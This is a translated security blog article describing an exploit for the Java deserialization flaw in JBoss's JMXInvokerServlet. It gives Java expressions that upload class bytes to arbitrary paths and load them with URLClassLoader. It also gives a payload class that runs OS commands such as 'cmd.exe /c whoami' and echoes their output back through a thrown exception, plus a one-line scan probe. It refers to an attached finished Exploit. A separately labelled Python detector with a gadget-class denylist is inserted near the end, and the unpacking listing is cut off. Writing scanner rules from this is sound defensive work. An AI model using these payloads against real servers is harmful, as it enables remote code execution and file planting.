Java deserialization vulnerability execution command echo implementation and Exploit download

Source: Internet
Author: User

Some of the technologies and tools mentioned in this article may be offensive in nature and are provided only for security learning and teaching purposes. Illegal use is prohibited!

0x00 Preface

Some time ago the Java deserialization vulnerability was all the rage: first came a payload generator from a foreign expert that could execute OS commands, and later the use of URLClassLoader to load remote classes and obtain a reverse shell. However, our company needed to add rules to identify this kind of vulnerability, and customers' vulnerability scans often run in a purely intranet environment, so the remote-class-loading approach does not work there. I wanted to write my own utility, which led to this article (it uses JBoss as the example).

0x01 Goals

1. The EXP may only use resources on the server's local machine and must not load remote classes.
2. Upload an arbitrary file to an arbitrary directory.
3. Obtain the echoed output of command execution.

0x02 Implementation

The EXP may only use resources on the server's local machine and must not load remote classes:

Analysing the cause of the vulnerability shows that we can only execute Java statements through chained calls. In other words, everything we want to execute must be written as a single expression, without semicolons. In fact this is a good breakthrough: whatever code we want to run, however long, we compile locally into a class and upload the class bytecode to the server. Then the next question: how do we upload the file, and to what path? Files can be uploaded with the FileOutputStream class, and the path is even simpler, since FileOutputStream takes the target path directly. In the past I uploaded the file to the current working directory of the program, with code like:

    new FileOutputStream("./payload.class").write(new byte[]{0xXX, 0xXX, ...});

Once the upload problem is solved, executing the class is easy:

    java.net.URLClassLoader.getConstructor(java.net.URL[].class).newInstance(new java.net.URL[]{new java.net.URL("file:./")}).loadClass("payload").newInstance("cmd.exe /c whoami");

This solves our first two goals: we use only the server's local resources without needing an Internet connection, and we can upload arbitrary files to arbitrary directories.

Obtain the echoed output of command execution:

Analysing the result returned by invoker/JMXInvokerServlet in JBoss shows that it is a MarshalledValue object, which encapsulates the return value of invoker/JMXInvokerServlet. If an exception is thrown during execution, an InvocationException object is encapsulated in the MarshalledValue object. The idea is now very clear: Java exceptions have a constructor that takes a String parameter, so in the class file from the previous step we take the result of command execution as the parameter to construct an Exception, and finally throw that Exception from payload.class. The Exception carrying the echoed output is then encapsulated in the MarshalledValue object and returned over HTTP. We only need to unpack the returned MarshalledValue object to obtain the echoed content.

The source code of payload.java is given below (the class is named RunCheckConfig in the listing):

    import java.io.BufferedReader;
    import java.io.InputStreamReader;

    public class RunCheckConfig {
        public RunCheckConfig(String args) throws Exception {
            // Run the command and collect everything it writes to stdout
            Process proc = Runtime.getRuntime().exec(args);
            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
            StringBuffer sb = new StringBuffer();
            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line).append("\n");
            }
            String result = sb.toString();
            // Carry the collected output back in the exception message
            Exception e = new Exception(result);
            throw e;
        }
    }

Source code of the unpacking program (the listing is cut off in the source shortly after the loop begins):

    public static void main(String args[]) throws Exception {
        // Read the raw HTTP response body saved from the invoker
        FileInputStream Fi = new FileInputStream("d:/response.bin");
        byte TempByte[] = new byte[5000 * 1000];
        int length = Fi.read(TempByte);
        int ClassStart = 0;
        for (int I = 0; I
        // ... the remainder of the listing is not present in the source

The result of running the unpacking program was shown as a screenshot that is not included in this copy of the article.

0x03 Summary

All three goals set out in this article have been achieved.

For the purpose of a vulnerability scan, it is even easier to determine whether the vulnerability exists. A single statement suffices: new FileOutputStream("\u0000");. Then look for the string "java.io.FileNotFoundException" in the response, or, as we did above, unpack the response and check whether the exception type is java.io.FileNotFoundException.
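As an added example (not code from the original article), the following Python walks a Java serialization stream and lists the class names in its TC_CLASSDESC records. A defender can run it over request bodies captured at invoker/JMXInvokerServlet to flag known gadget classes, and over the returned MarshalledValue stream to recognise the exception class, which is the unpacking check the article and the summary describe. The denylist and the sample streams are constructed assumptions, and array descriptors (names beginning with '[') are deliberately skipped.

```python
import re
STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java serialization header, stream version 5
TC_CLASSDESC = 0x72                  # type code that precedes a class descriptor
CLASS_NAME_RE = re.compile(rb"^[A-Za-z_$][\w$.]*$")  # plain (non-array) Java class name

# Assumed denylist: InvokerTransformer is the well-known Commons-Collections gadget
# class; URLClassLoader is the loader the article's payload chain relies on.
SUSPICIOUS_CLASSES = {
    "org.apache.commons.collections.functors.InvokerTransformer",
    "java.net.URLClassLoader",
}

def extract_class_names(stream: bytes) -> list:
    """Heuristically list class names from TC_CLASSDESC records, in stream order.

    A descriptor is 0x72, a big-endian u16 length, then the name; only candidates
    that look like a Java class name count, so stray 0x72 bytes give no false hits.
    """
    if not stream.startswith(STREAM_MAGIC):
        raise ValueError("not a Java serialization stream")
    names, i = [], len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            length = int.from_bytes(stream[i + 1:i + 3], "big")
            name = stream[i + 3:i + 3 + length]
            if len(name) == length and CLASS_NAME_RE.match(name):
                names.append(name.decode("ascii"))
                i += 3 + length  # skip the name so its bytes are not rescanned
                continue
        i += 1
    return names

def flag_stream(stream: bytes) -> list:
    """Return the denylisted class names present in the stream (empty means clean)."""
    return [n for n in extract_class_names(stream) if n in SUSPICIOUS_CLASSES]

def classdesc(name: str) -> bytes:
    """Minimal class-descriptor prefix, used only to build the constructed samples."""
    raw = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + len(raw).to_bytes(2, "big") + raw

# Constructed samples: header, TC_OBJECT (0x73) and descriptor prefixes only.
BENIGN_REQUEST = STREAM_MAGIC + b"\x73" + classdesc("org.jboss.invocation.MarshalledValue")
GADGET_REQUEST = (STREAM_MAGIC + b"\x73" + classdesc("java.util.HashMap")
                  + classdesc("org.apache.commons.collections.functors.InvokerTransformer"))
# Response shape from the article: MarshalledValue -> InvocationException -> thrown exception.
SCAN_RESPONSE = (STREAM_MAGIC + b"\x73" + classdesc("org.jboss.invocation.MarshalledValue")
                 + classdesc("org.jboss.invocation.InvocationException")
                 + classdesc("java.io.FileNotFoundException"))
```

A truncated stream simply loses the cut-off descriptor rather than producing a bogus name, so the walker is safe to run on partial captures.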

In addition, the finished Exploit is attached and is for research only; do not use it for any illegal activities. (The attachment link is not preserved in this copy of the article.)
